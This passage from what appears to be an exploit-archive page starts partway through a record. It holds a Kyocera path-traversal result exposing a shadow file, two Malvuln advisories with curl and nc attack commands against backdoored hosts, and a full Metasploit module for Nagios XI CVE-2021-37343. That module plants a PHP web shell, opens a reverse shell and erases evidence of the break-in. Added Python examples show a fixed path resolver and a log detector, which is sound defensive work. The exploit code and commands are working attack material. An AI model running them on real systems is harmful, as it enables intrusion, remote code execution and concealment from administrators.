/>telnetd:*:15873::::::<br />backup:*:15873::::::<br />ais:*:15873::::::<br />nobody:*:15873::::::<br /><br /></code></pre>
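The requests above combine two defects: `../` segments climb out of the static `/js/` directory, and the `%00` makes the path the server opens end before `.jpg` (the `ETag` echoes the path without the extension while the response is still typed `image/jpeg`). The following is an added example of my own, not Kyocera firmware code, that emulates a resolver with those defects in Python (the split at the first NUL stands in for C string functions) beside a corrected one that decodes first, refuses NUL outright, normalises, and only then checks both the extension and that the result is still inside the web root. `DOCROOT` and the `FAKE_FS` contents are constructed; the printer's real filesystem layout is not in the advisory.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote_to_bytes

# Assumed web root; the advisory does not reveal the firmware's layout.
DOCROOT = "/var/www"

# Constructed stand-in for the device filesystem.
FAKE_FS = {
    "/var/www/js/app.js": b"// app",
    "/var/www/img/logo.jpg": b"\xff\xd8 jpeg bytes",
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n",
}

ALLOWED_EXT = (".jpg", ".js", ".css")


def resolve_vulnerable(raw_path: str) -> Optional[bytes]:
    """Extension allow-list evaluated on the URL as received; then the decoded
    bytes go to C-string file APIs, which stop at the first NUL, and '..' is
    resolved by the kernel because nothing checks containment."""
    if not raw_path.lower().endswith(ALLOWED_EXT):
        return None
    decoded = unquote_to_bytes(raw_path)
    c_string = decoded.split(b"\x00", 1)[0]            # where strcpy/fopen stop
    fs_path = DOCROOT + c_string.decode("latin-1")     # naive concatenation
    return FAKE_FS.get(posixpath.normpath(fs_path))    # kernel collapses '..'


def resolve_fixed(raw_path: str) -> Optional[bytes]:
    """Decode first, reject NUL outright, normalise, then check extension and
    containment on the final path that will actually be opened."""
    decoded = unquote_to_bytes(raw_path)
    if b"\x00" in decoded:                             # never legitimate in a path
        return None
    try:
        path = decoded.decode("utf-8")
    except UnicodeDecodeError:
        return None
    full = posixpath.normpath(posixpath.join(DOCROOT, path.lstrip("/")))
    if not full.startswith(DOCROOT + "/"):             # escaped the web root
        return None
    if not full.lower().endswith(ALLOWED_EXT):
        return None
    return FAKE_FS.get(full)
```

Testing a real device the same way: the fixed behaviour is a 404 (or 400) for the traversal request whether or not `%00.jpg` is appended, and the extension must be judged on the decoded, normalised path rather than on the URL text.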
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/8b484576f928c256277016104cc364c2.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.BackAttack.20<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: BackAtTack 2.0 by CurrenTChaoSGroup (CCG) by default listens on TCP ports 80 and 11131. The malware features a remote web interface for controlling an infected host. Third-party attackers who can reach the system can run the commands the malware exposes, e.g. take a screenshot, restart the system, enable FTP or even destroy the backdoor. The web UI does not require authentication to execute these commands.<br />Type: PE32<br />MD5: 8b484576f928c256277016104cc364c2<br />Vuln ID: MVID-2021-0423<br />Disclosure: 12/11/2021<br /><br />Exploit/PoC:<br />Show Skeleton<br />http://x.x.x.x/showskeleton<br /><br />Show Sex<br />http://x.x.x.x/showsex<br /><br />Who's logged on<br />curl http://x.x.x.x/whoisthere <br /><br />Screen capture<br />curl http://x.x.x.x/capturescreen<br /><br />Enable FTP<br />curl http://x.x.x.x/ftpon <br /><br />Restart host<br />curl http://x.x.x.x/restart <br /><br />Destroy the backdoor<br />curl http://x.x.x.x/destroyyes -v<br /><br />Destroy action has been executed! -Restart procedure initiated also-<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. 
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::NagiosXi<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Nagios XI Autodiscovery Webshell Upload',<br /> 'Description' => %q{<br /> This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343).<br /> The path traversal allows a remote and authenticated administrator to upload a PHP web shell<br /> and execute code as `www-data`. The module achieves this by creating an autodiscovery job<br /> with an `id` field containing a path traversal to a writable and remotely accessible directory,<br /> and `custom_ports` field containing the web shell. A cron file will be created using the chosen<br /> path and file name, and the web shell is embedded in the file.<br /><br /> After the web shell has been written to the victim, this module will then use the web shell to<br /> establish a Meterpreter session or a reverse shell. 
By default, the web shell is deleted by<br /> the module, and the autodiscovery job is removed as well.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Claroty Team82', # vulnerability discovery<br /> 'jbaines-r7' # metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2021-37343'],<br /> ['URL', 'https://claroty.com/2021/09/21/blog-research-securing-network-management-systems-nagios-xi/']<br /> ],<br /> 'DisclosureDate' => '2021-07-15',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_openssl'<br /> },<br /> 'Payload' => {<br /> 'Append' => ' & disown'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'printf' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options [<br /> OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),<br /> OptString.new('PASSWORD', [true, 'Password to authenticate with', nil]),<br /> OptInt.new('DEPTH', [true, 'The depth of the path traversal', 10]),<br /> OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. 
This value is random if left unset', nil]),<br /> OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true])<br /> ]<br /><br /> @webshell_uri = '/includes/components/highcharts/exporting-server/temp/'<br /> @webshell_path = '/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/'<br /> end<br /><br /> # Authenticate and grab the version from the dashboard. Store auth cookies for later use.<br /> def check<br /> login_result, res_array = nagios_xi_login(datastore['USERNAME'], datastore['PASSWORD'], false)<br /> case login_result<br /> when 1..3 # An error occurred<br /> return CheckCode::Unknown(res_array[0])<br /> when 4<br /> return CheckCode::Detected('Nagios is not fully installed.')<br /> when 5<br /> return CheckCode::Detected('The Nagios license has not been signed.')<br /> end<br /><br /> # res_array[1] cannot be nil since the mixin checks for that already.<br /> @auth_cookies = res_array[1]<br /><br /> nagios_version = nagios_xi_version(res_array[0])<br /> if nagios_version.nil?<br /> return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')<br /> end<br /><br /> # affected versions are 5.2.0 -> 5.8.4<br /> if Rex::Version.new(nagios_version) < Rex::Version.new('5.8.5') &&<br /> Rex::Version.new(nagios_version) >= Rex::Version.new('5.2.0')<br /> return CheckCode::Appears("Determined using the self-reported version: #{nagios_version}")<br /> end<br /><br /> CheckCode::Safe("Determined using the self-reported version: #{nagios_version}")<br /> end<br /><br /> # Using the path traversal, upload a php webshell to the remote target<br /> def drop_webshell<br /> autodisc_uri = normalize_uri(target_uri.path, '/includes/components/autodiscovery/')<br /> print_status("Attempting to grab a CSRF token from #{autodisc_uri}")<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => autodisc_uri,<br /> 'cookie' => @auth_cookies,<br /> 'vars_get' => {<br /> 
'mode' => 'newjob'<br /> }<br /> })<br /><br /> fail_with(Failure::Disconnected, 'Connection failed') unless res<br /> fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected HTTP body') unless res.body.include?('<title>New Auto-Discovery Job')<br /><br /> # snag the nsp token from the response<br /> nsp = get_nsp(res)<br /> fail_with(Failure::Unknown, 'Failed to obtain the nsp token which is required to upload the web shell') if nsp.blank?<br /><br /> # drop a basic web shell on the server<br /> webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}")<br /> print_status("Uploading webshell to #{webshell_location}")<br /> php_webshell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'<br /> payload = 'update=1&' \<br /> "job=#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}&" \<br /> "nsp=#{nsp}&" \<br /> 'address=127.0.0.1%2F0&' \<br /> 'frequency=Yearly&' \<br /> "custom_ports=#{php_webshell}&"<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => autodisc_uri,<br /> 'cookie' => @auth_cookies,<br /> 'vars_get' => {<br /> 'mode' => 'newjob'<br /> },<br /> 'data' => payload<br /> })<br /><br /> fail_with(Failure::Disconnected, 'Connection failed') unless res<br /> fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res.code == 302<br /><br /> # Test the web shell installed by echoing a random string and ensure it appears in the res.body<br /> print_status('Testing if web shell installation was successful')<br /> rand_data = Rex::Text.rand_text_alphanumeric(16..32)<br /> res = execute_via_webshell("echo #{rand_data}")<br /> fail_with(Failure::UnexpectedReply, 'Web shell execution did not appear to succeed.') unless res.body.include?(rand_data)<br /> print_good("Web shell installed at #{webshell_location}")<br /><br /> # This is a great place to leave a 
web shell for persistence since it doesn't require auth<br /> # to touch it. By default, we'll clean this up but the attacker has the option to leave it<br /> if datastore['DELETE_WEBSHELL']<br /> register_file_for_cleanup("#{@webshell_path}#{@webshell_name}")<br /> end<br /> end<br /><br /> # Successful exploitation creates a new job in the autodiscovery view. This function deletes<br /> # the job so that there is no evidence of exploitation in the UI.<br /> def cleanup_job<br /> print_status('Deleting autodiscovery job')<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/includes/components/autodiscovery/'),<br /> 'cookie' => @auth_cookies,<br /> 'vars_get' => {<br /> 'mode' => 'deletejob',<br /> 'job' => "#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}"<br /> }<br /> })<br /><br /> fail_with(Failure::Disconnected, 'Connection failed') unless res<br /> fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res&.code == 302<br /> end<br /><br /> # Executes commands via the uploaded webshell<br /> def execute_via_webshell(cmd)<br /> cmd = Rex::Text.uri_encode(cmd)<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, "/includes/components/highcharts/exporting-server/temp/#{@webshell_name}?cmd=#{cmd}")<br /> })<br /><br /> fail_with(Failure::Disconnected, 'Connection failed') unless res<br /> fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res.code == 200<br /> res<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> execute_via_webshell(cmd)<br /> end<br /><br /> def exploit<br /> # create a randomish web shell name if the user doesn't specify one<br /> @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php"<br /><br /> drop_webshell<br /><br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case 
target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> ensure<br /> cleanup_job<br /> end<br />end<br /></code></pre>
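The module above leaves two footprints a defender can look for in the web server's access log: a POST to the autodiscovery endpoint with mode=newjob, and a GET to a .php file under the highcharts exporting-server temp directory carrying a cmd query parameter (the shell is driven through the query string, so unlike the POST body it is logged). The detector below is an added example, not part of the module or the target product; it assumes Apache combined log format, uses "/app" as a placeholder application prefix, and runs over constructed log lines.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines for this example (not from a real host).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /app/includes/components/autodiscovery/?mode=newjob HTTP/1.1" 200 5120
10.0.0.5 - - [10/Dec/2021:10:00:02 +0000] "POST /app/includes/components/autodiscovery/?mode=newjob HTTP/1.1" 302 0
10.0.0.5 - - [10/Dec/2021:10:00:03 +0000] "GET /app/includes/components/highcharts/exporting-server/temp/qzxvtw.php?cmd=echo%20abc HTTP/1.1" 200 7
10.0.0.9 - - [10/Dec/2021:10:05:00 +0000] "GET /app/includes/components/highcharts/exporting-server/temp/chart.png HTTP/1.1" 200 3000
10.0.0.9 - - [10/Dec/2021:10:06:00 +0000] "POST /app/includes/components/autodiscovery/?mode=newjob HTTP/1.1" 302 0
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TEMP_DIR = "/includes/components/highcharts/exporting-server/temp/"  # path used by the module
AUTODISC = "/includes/components/autodiscovery/"


def classify(method, target):
    """Return a finding label for one request, or None if it looks benign."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    if TEMP_DIR in parts.path and parts.path.lower().endswith(".php"):
        # The exporting-server temp directory should only hold rendered chart
        # images; a PHP script there is a dropped file, and a cmd parameter on
        # top of that matches the shell the module installs.
        return "webshell_exec" if "cmd" in query else "php_in_temp_dir"
    if method == "POST" and AUTODISC in parts.path and query.get("mode") == ["newjob"]:
        return "autodiscovery_newjob"
    return None


def scan(log_text):
    """Return (ip, label) findings. A newjob POST on its own is legitimate
    admin activity, so it is only remembered; a later PHP hit under the temp
    directory from the same client is then reported as a sequence."""
    seen_newjob, findings = set(), []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, label = m["ip"], classify(m["method"], m["target"])
        if label == "autodiscovery_newjob":
            seen_newjob.add(ip)
        elif label is not None:
            findings.append((ip, "newjob_then_" + label if ip in seen_newjob else label))
    return findings


if __name__ == "__main__":
    for ip, label in scan(SAMPLE_LOG):
        print(f"{ip}: {label}")
```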
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/991c1f02c809cee860cb712896a45338_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Ncx.b<br />Vulnerability: Remote Stack Buffer Overflow<br />Description: The malware listens on TCP port 99. Third-party attackers who can reach an infected system can send a large junk payload and trigger a classic stack buffer overflow overwriting the EIP, ECX registers.<br />Type: PE32<br />MD5: 991c1f02c809cee860cb712896a45338<br />Vuln ID: MVID-2021-0422<br />ASLR: False<br />DEP: False<br />Safe SEH: True<br />Disclosure: 12/11/2021<br /><br />Memory Dump:<br />(f40.12a4): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=00000000 edi=00000000<br />eip=41414141 esp=03051660 ebp=03051680 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />41414141 ?? ???<br /><br />0:003> .ecxr<br />eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=00000000 edi=00000000<br />eip=41414141 esp=03051660 ebp=03051680 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />41414141 ?? 
???<br />0:003> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe<br />*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe<br /><br />FAULTING_IP: <br />Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338+1555<br />00401555 88443418 mov byte ptr [esp+esi+18h],al<br /><br />EXCEPTION_RECORD: 0314f9f4 -- (.exr 0x314f9f4)<br />ExceptionAddress: 00401555 (Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338+0x00001555)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000001<br /> Parameter[1]: 03150000<br />Attempt to write to address 03150000<br /><br />PROCESS_NAME: Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000008<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />WRITE_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338+1555<br />00401555 88443418 mov byte ptr [esp+esi+18h],al<br /><br />FAILED_INSTRUCTION_ADDRESS: <br />+1555<br />41414141 ?? 
???<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />IP_ON_HEAP: 027d0b40<br />The fault address in not in any loaded module, please check your build's rebase<br />log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may<br />contain the address if it were loaded.<br /><br />IP_IN_FREE_BLOCK: 41414141<br /><br />CONTEXT: 0314fa44 -- (.cxr 0x314fa44)<br />eax=00000041 ebx=7745e250 ecx=5804cfad edx=0314fdc4 esi=00000144 edi=027d0b40<br />eip=00401555 esp=0314fea4 ebp=740a1e90 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202<br />Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338+0x1555:<br />00401555 88443418 mov byte ptr [esp+esi+18h],al ss:002b:03150000=??<br />Resetting default scope<br /><br />FAULTING_THREAD: ffffffff<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />LAST_CONTROL_TRANSFER: from 027d0b40 to 00401555<br /><br />FRAME_ONE_INVALID: 1<br /><br />STACK_TEXT: <br />0314fea4 00401555 backdoor_win32_ncx_b+0x1555<br />0314fea8 027d0b40 unknown!unknown+0x0<br /><br /><br />STACK_COMMAND: .cxr 000000000314FA44 ; kb ; dds 314fea4 ; kb<br /><br />SYMBOL_STACK_INDEX: 0<br /><br />SYMBOL_NAME: backdoor_win32_ncx_b+1555<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338<br /><br />IMAGE_NAME: Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 34ae8eb9<br /><br />BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_ncx_b+1555<br /><br />FAILURE_BUCKET_ID: 
STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe!Unknown<br /><br /><br />Exploit/PoC:<br />python -c "print('A'*3306)" | nc64.exe MALWARE_HOST 99<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>